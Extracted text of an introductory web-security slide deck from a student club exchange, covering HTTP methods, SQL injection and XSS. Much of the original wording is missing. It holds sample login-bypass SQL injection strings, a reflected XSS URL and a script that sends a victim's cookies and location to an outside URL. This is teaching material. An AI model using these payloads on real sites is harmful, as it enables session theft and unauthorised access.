Web Sec: A Brief Introduction
Jyny Chen
Exchange event between the NCHU Information Science Study Club and the Feng Chia University Hacker Club
1.
Web Sec Intro jyny
@ NCHUIT
2.
( )
3.
Web Sec ( XD)
4.
:) hello world :)
5.
About • jyny • • • • • • • TDOH •
jyny.tw • about.me/jyny
6.
• HTTP Method •
SQL Injection • XSS •
7.
8.
HTTP Method ( )
9.
HTTP Method • GET •
POST • etc.
10.
HTTP Method • GET •
HTTP Request • Enter
11.
HTTP Method • POST • •
" "," "
12.
m(_ _)m
13.
what??
14.
?=
15.
GET POST • key
value • url.com?key=value • & • % Url encode
16.
HTTP Method • • or •
g0t.pw/http.php
17.
18.
SQL Injection
19.
SQL Injection • SQL •
SQL • OWASP Top 10 •
20.
SQL Injection • GET
POST DB • server • Server SQL
21.
....
22.
SQL Injection • PHP
query
23.
SQL Injection • • username
= jyny • password = pwd
24.
SQL Injection • SQL
query
25.
Orz
26.
But
27.
SQL Injection • • username
= 1' OR uid='1'/* • password = */ OR password='
28.
29.
SQL Injection • SQL
query
30.
SQL Injection • SQL
query • query
31.
....
32.
SQL Injection
33.
SQL Injection • • user=%27%20or%20%27%27%20%3D%20%27%27%20--&pass=aaaaaaa •
URL encoding • %27 %20 %3d
34.
SQL Injection •
35.
SQL Injection • •
36.
XD
37.
SQL Injection • •
38.
SQL Injection • SQL • •
39.
SQL Injection • SQL
Injection • sqlmap
40.
41.
XSS
42.
XSS • Cross-site scripting • •
OWASP Top 10
43.
XSS • <script>...</script> • • WOW!
44.
XSS • Server • •
45.
XSS • • XD
46.
XSS • • g0t.pw/xhttp.php?%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E • Orz •
47.
XSS • • • <script> document.write('<img src="http://url?cookie='
+ document.cookie + '&location=' + document.location + '" />'); </script>
48.
XSS • ? • request •
cookie • Cookie
49.
Cookie
50.
XSS • Cookie • Session •
51.
52.
upload • • %00 • •
53.
• code injection •
comment injection • •
54.
Orz
55.
• • •
56.
Reference
• http://www.slideshare.net/chivincent/sql-injection-in-ttu
• https://gist.github.com/Inndy/654aaf98cb260b75b8f3
• https://github.com/Jyny/pasc2at
• https://securityreactions.tumblr.com/
57.
THX